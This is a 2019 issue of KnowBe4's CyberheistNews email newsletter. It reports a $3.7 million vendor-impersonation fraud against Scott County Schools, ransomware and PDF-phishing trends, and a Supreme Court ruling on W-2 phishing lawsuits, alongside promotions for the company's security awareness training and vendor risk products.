CyberheistNews Vol 9 #18 Scott County Schools Victim of 3.7 Million Dollar CEO Fraud Phishing Scam




CyberheistNews Vol 9 #18
Scott County Schools Victim of 3.7 Million Dollar CEO Fraud Phishing Scam

(WKYT) - Scott County Schools has announced the district is a victim of a multi-million dollar online scam. The FBI is now investigating after Superintendent Dr. Kevin Hub said an undisclosed vendor told the district it was never paid for an invoice from two weeks ago. As the district investigated, it learned it fell victim to a fraudulent email disguising as the vendor.

"This is a process that we use currently in Scott County Schools. It's a way that we pay our vendors. And it was in this specific case, a single case, that we can verify, and this fraudulent email and fraudulent documentation is what caused this crime to happen."

The school lost USD 3.7 million as a result of the scam. Hub said the fraudsters no longer have access to the district's bank account, and there was no data breach involving personal information.

Sounds like they could use some new-school security awareness training. Video at WKYT:
https://blog.knowbe4.com/scott-county-schools-victim-of-3.7-million-ceo-fraud-scam
[TOMORROW] See Ridiculously Easy Security Awareness Training and Phishing

Old-school awareness training does not hack it anymore. Your email filters have an average 10-15% failure rate; you need a strong human firewall as your last line of defense.

Join us tomorrow, Wednesday, May 1st @ 2:00 p.m. (ET), for a live demonstration of how KnowBe4 introduces a new-school approach to security awareness training and simulated phishing. See the latest product features and how easy it is to train and phish your users.
  • Train your users with access to the world's largest library of awareness training content and automated training campaigns with scheduled reminder emails.
  • Send fully automated simulated phishing attacks, using thousands of customizable templates with unlimited usage.
  • Virtual Risk Officer shows you the Risk Score by user, group, and your whole organization.
  • Advanced Reporting on 60+ key awareness training indicators.
  • Active Directory Integration to easily upload user data, eliminating the need to manually manage user changes.
  • Identify and respond to email threats faster. Enhance your incident response efforts with the PhishER add-on!
Find out how 24,000+ organizations have mobilized their end-users as their human firewall.

Date/Time: TOMORROW, Wednesday, May 1st @ 2:00 pm (ET)

Save My Spot!
https://event.on24.com/wcc/r/1989543/27ACCF5780A6F77D8D84D1C75E9C46D6?partnerref=CHN
Over 500% Increase in Ransomware Attacks Against Businesses

Malwarebytes’ latest quarterly report on cybercrime shows that crooks are increasingly targeting businesses. The company registered a 24% drop in cyber attacks against consumers in the first quarter of 2019, but saw threats affecting companies jump by 235%.

The report also shows that more and more threat actors are embracing ransomware again as part of campaigns that go after businesses. Ransomware attacks against firms rose by 189% compared to Q4 of 2018 and by a staggering 508% compared to Q1 of 2018. At the same time however, ransomware attacks against consumers declined to the point that for the first time in years, ransomware did not make the top 10 of threats for consumers. Read more here:
https://www.bleepingcomputer.com/news/security/over-500-percent-increase-in-ransomware-attacks-against-businesses/
[NEW Video] The Social Engineering Battlefront, Featuring Gartner

There is one constant in the security world: the attackers will continue to evolve their methods as the defenders find ways to thwart attacks. So, it should come as no surprise that attackers are doing anything they can to slip into your networks through whatever means are most expedient.

Often, the most expedient path is to bypass technology-based defenses partially or altogether and target your end-users, seeking to exploit human nature.

Your users stand—knowingly or not—at the front lines in the battle to secure your network as a vast horde of cybercriminals are on the move, readying their next wave of attacks. And the battlefront is email.

So, what are the trends in email security? Is there hope? And what can you do now to protect your organization? What “people, process, and technology” strategies can be effective in helping to mitigate the threats?

Watch this video where two of the industry’s leading experts – Featured Gartner Research Analyst Neil Wynne and KnowBe4’s Chief Evangelist & Strategy Officer, Perry Carpenter -- wrestle with these questions, analyze attacker methods, and offer practical advice.

Watch Now: https://info.knowbe4.com/video-lp-social-engineering-battlefront-gartner

Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, express or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose. Gartner is a registered trademark and service mark of Gartner, Inc. and/or its affiliates in the U.S. and internationally, and is used herein with permission. All rights reserved.
PDFs Return as Phishbait

The use of malware-laden PDF email attachments has spiked in recent months, internet security company SonicWall has found. Over the course of 2018, SonicWall detected 47,000 new attack variants using PDFs, while they observed more than 73,000 of these variants last month alone. 67,000 of these PDFs linked to scammers, while 5,500 contained links to malware downloads.

John Oates at the Register notes that, while malicious PDF attachments aren’t a new phenomenon, a surge of this magnitude shouldn’t be taken lightly.

“In many cases, targeted PDFs use zero-day exploits for browsers in order to increase the probability of a successful attack as on-the-ball businesses now patch their systems more quickly to protect against known exploits,” Oates writes. “Other attacks have been known to nick login details by tricking the user into opening malicious PDFs that use remote document loading mechanisms to capture and leak your credentials.”

Many Security Filters Struggle to Analyze Content Inside PDFs

Most of the attacks observed by SonicWall simply used PDFs to smuggle malicious links through email security filters. Many security filters struggle to analyze content inside PDFs, so an attacker stands a better chance of getting through to their victim if they place the link in one of these files.

SonicWall CEO Bill Conner said that PDFs are increasingly becoming a “vehicle of choice for malware and fraud in the cyber landscape,” alongside emails and Office documents. More and links at:
https://blog.knowbe4.com/pdfs-return-as-phishbait
Find Out How Many Weak Passwords Are in Your Network for a Chance to Win a Nintendo Switch

Are your user’s passwords…P@ssw0rd? Verizon's Data Breach Report showed that 81% of hacking-related breaches used either stolen and/or weak passwords. Employees are the weakest link in your network security.

KnowBe4's Weak Password Test checks your Active Directory for 10 different types of weak password related threats and reports any fails so that you can take action. Plus if you're in the US or Canada, you’ll be entered for a chance to win a Nintendo Switch!*

This will take you 5 minutes and may give you some insights you never expected!

Find Your Weak Passwords: https://info.knowbe4.com/wpt-sweepstakes-042019

* Terms and conditions apply.

Let's stay safe out there.

Warm Regards,
Stu Sjouwerman
Founder and CEO
KnowBe4, Inc

Quotes of the Week
"All truth passes through three stages. First, it is ridiculed. Second, it is violently opposed. Third, it is accepted as being self-evident." - Arthur Schopenhauer - Philosopher (1788 - 1850)

"Attitude is a little thing that makes a big difference." - Winston Churchill - Statesman (1874 - 1965)



Thanks for reading CyberheistNews
Security News
US Supreme Court Curbs Class Action Lawsuits Caused by W-2 Phishing Fraud

The upshot: This case made it all the way to the Supreme Court and sets a new precedent. A phished employee sent out 1,300 confidential employee W-2 data. One of the employees said a fraudulent 2015 federal income tax return was filed in his name, and sued in federal court in California and sought class-action status on behalf of his fellow workers. The Supreme Court overruled the District Court ruling which said Class Arbitration was allowed.

Out of the Frying Pan Into the Fire?

If you prevent employees from litigating claims as class or collective actions you might be inflicting the death of a thousand cuts upon your organization. How so? Well, class actions lawsuits are expensive, large and unwieldy. However, they do offer the opportunity for a permanent and final settlement. Your organization had the opportunity to resolve the issue in one lone (admittedly large) case.

If you no longer have a class action available, you are forced into the alternative arbitration route, which means your employees all—or a sizable subsection—litigate in individual cases. Instead of facing one claim, your organization will be exposed to dozens, or hundreds, or thousands of individual claims. The problem with these is that each carries with it a relatively small amount of damages, and a large exposure for an attorneys' fee award in each case.

So, before you jump on the class-action waiver bandwagon, talk to your employment lawyer and consider whether it's in the best interest of your particular organization. Do you want one really large cut, or thousands of smaller ones?

This whole massively expensive incident could have been prevented by stepping high-risk employees through new-school security awareness training. Here is more detail that I suggest you forward to your legal counsel:
https://blog.knowbe4.com/breaking-news-us-supreme-court-curbs-class-action-lawsuits-caused-by-w-2-phishing-fraud
Email Threats Become More Focused and Malware Gets Harder to Detect

"Our 2018 findings portray a story about adaptiveness, both from a business and cybercriminal perspective," says Arthur Wong, chief executive officer at Trustwave. "We are seeing the global threat landscape continue to evolve as cybercriminals deterred by advanced monitoring and detection systems go to extraordinary lengths to breach organizations by wielding new malware variants, zero-day exploits and social engineering savvy.

It's becoming imperative for businesses accelerating digital transformation to implement security programs that can quickly address attack innovation and ever-changing environments through leading-edge technologies and high-level security expertise."

The added sophistication shows in that 67 percent of malware analyzed uses obfuscation to help avoid detection, a leap from 30 percent the previous year. Social engineering continues to play a part too. In both cloud and POS environments, 60 percent of breach investigations attribute successful social engineering as allowing cybercriminals to gain entry.

The full report is available from the Trustwave site:
https://betanews.com/2019/04/25/email-threat-focus-detection/
Your Supply Chain Is a Massive Risk. How Do You Mitigate This?

Using third party vendors helps you increase efficiencies but also introduces risk into your organization. According to Ponemon Institute’s 2018 “Data Risk in the Third-Party Ecosystem” study, 59% of organizations experienced a data breach caused by a third-party vendor.

So you have to make sure that your vendors use best-in-class security practices, and we are excited to announce we have expanded our new KCM GRC product with the new Vendor Risk Management module. KCM GRC now includes four modules: Compliance, Policy, Risk and Vendor Risk. Now, you can effectively and efficiently manage risk and compliance within your organization and across your third-party vendors, while gaining insight into gaps within your security program.

The Problem

You have challenging compliance requirements, not enough time to get audits done, and keeping up with risk assessments including third-party vendors is a continuous problem.

Big, complex GRC platforms are expensive, take forever to deploy, and need 2 people with wrenches to keep them going. Meanwhile, your compliance, risk, and audit projects are piling up because of the lack of resources. Your organization does not need overly complex workflows, but somehow GRC vendors think “complex is good” and expensive.

Specific GRC Problems that IT Teams Face:
  • Challenging compliance requirements
  • Not enough time to get audits done
  • Keeping up with risk assessments
  • Vetting and managing vendors to mitigate third-party risk
  • Lack of resources
  • No easy-to-use tools
  • The Problem Related to Vendor Risk Management
59% Experienced a Data Breach Caused by a Third-Party Vendor

With more than half of all breaches originating through vendors, effectively mitigating your third-party risk is crucial. We know that managing your vendors has become difficult to do without a centralized platform and a defined process that gives you visibility into the tasks and controls that need to be addressed by your vendors.

Without an easy and affordable platform to manage risks related to your vendors these are some of the pain points we’ve heard from you:
  • Traditional spreadsheets make it hard to keep track of all your vendors and data
  • You have no easy view into your vendors’ strengths and weaknesses without manual effort
  • There is limited time and lack of resources to assess vendors
  • No consistent or standard process for assessment of vendors
  • Difficult to monitor your vendors’ risk
  • You need a better way to understand which vendors have access to certain data
  • Being able to efficiently handle vendor offboarding questionnaires
Managing This Problem

The KCM GRC platform was developed to save you the maximum amount of time getting GRC done. Old-school GRC offerings require many months of implementation and high consulting hours to stand up. KCM GRC has a simple, intuitive user interface, easy to understand workflows, a short learning curve, and will be fully functional in a matter of days.

In half the time and half the cost, with KCM GRC you can efficiently manage compliance and risk initiatives, vet and manage third-party risk, and understand at a glance what items need to be addressed.

Get Your Audits Done in Half the Time at Half the Cost

When your next audit comes up, are you thinking: “UGH, is it that time again?” It does not have to be that way! With KnowBe4’s KCM you can manage your compliance and risk projects and vet and monitor your third-party vendors faster than ever. KCM is a surprisingly affordable Governance, Risk and Compliance (GRC) SaaS platform that will get your audits done in half the time!

Special Sales Promotion

A special limited time upgrade offer with a discount to get our Platinum Subscription Level at 20% off* With an upgrade to Platinum, you can now add the new Vendor Risk Management module to your platform.

Get a First Look at the New Vendor Risk Management Module.

Watch this 8-minute on-demand product demonstration for a first look at the new Vendor Risk Management module. See how you can simplify the challenges of managing your compliance requirements and ease your burden when it’s time for risk assessments and audits:
https://info.knowbe4.com/demo-kcm-grc-vendor-risk-customer
What KnowBe4 Customer Say

"Hi Stu, thanks for reaching out. I’ve been very pleased with the product so far. We have finished our initial baseline test, conducted the 45 min Kevin Mitnick training and have begun weekly testing. I have received very positive feedback about the training and our click rate on the tests dropped from nearly 30% to 3%. I have recommended KnowBe4 to several colleagues in the IT industry because I believe training your users is one of the smartest things you can do to protect yourself. Thanks!"
- B.J., Director of IT



"Thank you so much for reaching out. I absolutely love the platform for both the awareness and the simulated phishing capabilities. I actually launched a simulated phishing campaign targeting my IT department today, our third campaign since purchasing the tool.

"I am seeing some very promising results, including measurable improvement in security awareness. We are seriously considering your KCM GRC platform as the next step to further improve our information security and compliance program’s maturity. Thank you again for reaching out."
F.J., CISSP, Dir InfoSec & Compliance



"I love it. It has made the largest impact on our security out of every tool we use. Our anti-virus and Office 365 security incidents have flatlined with the use of KnowBe4. Keep up the awesomeness!"
- J.J., IT System Administrator
The 10 Interesting News Items This Week
    1. Who Gets Targeted Most in Cyberattack Campaigns:
      https://www.darkreading.com/vulnerabilities---threats/who-gets-targeted-most-in-cyberattack-campaigns/d/d-id/1334494

    2. 21 CyberSecurity Twitter Accounts You Should Be Following:
      https://securityboulevard.com/2019/04/21-cybersecurity-twitter-accounts-you-should-be-following/

    3. 1 In 4 Workers Are Aware Of Security Guidelines...But Ignore Them:
      https://www.darkreading.com/threat-intelligence/1-in-4-workers-are-aware-of-security-guidelines---but-ignore-them/d/d-id/1334492

    4. Latest FBI Crime Report: "Losses From BEC Scams Almost Doubled Last Year":
      https://www.eweek.com/security/fbi-email-enterprises-scam?topnavlink

    5. John McAfee Vows to Unmask Crypto’s Satoshi Nakamoto, Then Backs Off:
      https://www.bloomberg.com/news/articles/2019-04-23/john-mcafee-vows-to-unmask-crypto-s-satoshi-nakamoto-within-days

    6. Microsoft Confirms Change To Windows 10 Passwords That Nobody Saw Coming:
      https://www.forbes.com/sites/daveywinder/2019/04/27/microsoft-confirms-change-to-windows-10-passwords-that-nobody-saw-coming/#5bafaf037bf2

    7. UK Cybersecurity: This free NCSC tool lets you test your hacker defenses:
      https://www.zdnet.com/article/cyber-security-this-free-tool-lets-you-test-your-hacker-defences/

    8. Towards an Information Operations Kill Chain And How To Disrupt The Russians:
      https://www.schneier.com/blog/archives/2019/04/towards_an_info.html

    9. 5 New Hacking Facts from the Mueller Report:
      https://www.secureworldexpo.com/industry-news/mueller-report-russian-hacking?

    10. The growing partnership between Russia's government and cybercriminals:
      https://www.cbsnews.com/news/evgeniy-mikhailovich-bogachev-the-growing-partnership-between-russia-government-and-cybercriminals-60-minutes/

    11. BONUS: Threat actors abuse GitHub service to host a variety of phishing kits:
      https://www.proofpoint.com/us/threat-insight/post/threat-actors-abuse-github-service-host-variety-phishing-kits
Prepared in cooperation with the CyberWire research team.
Cyberheist 'Fave' Links
This Week's Links We Like, Tips, Hints and Fun Stuff

FOLLOW US ON: Twitter | LinkedIn | YouTube
Copyright © 2014-2019 KnowBe4, Inc. All rights reserved.



Subscribe To Our Blog


Comprehensive Anti-Phishing Guide




Get the latest about social engineering

Subscribe to CyberheistNews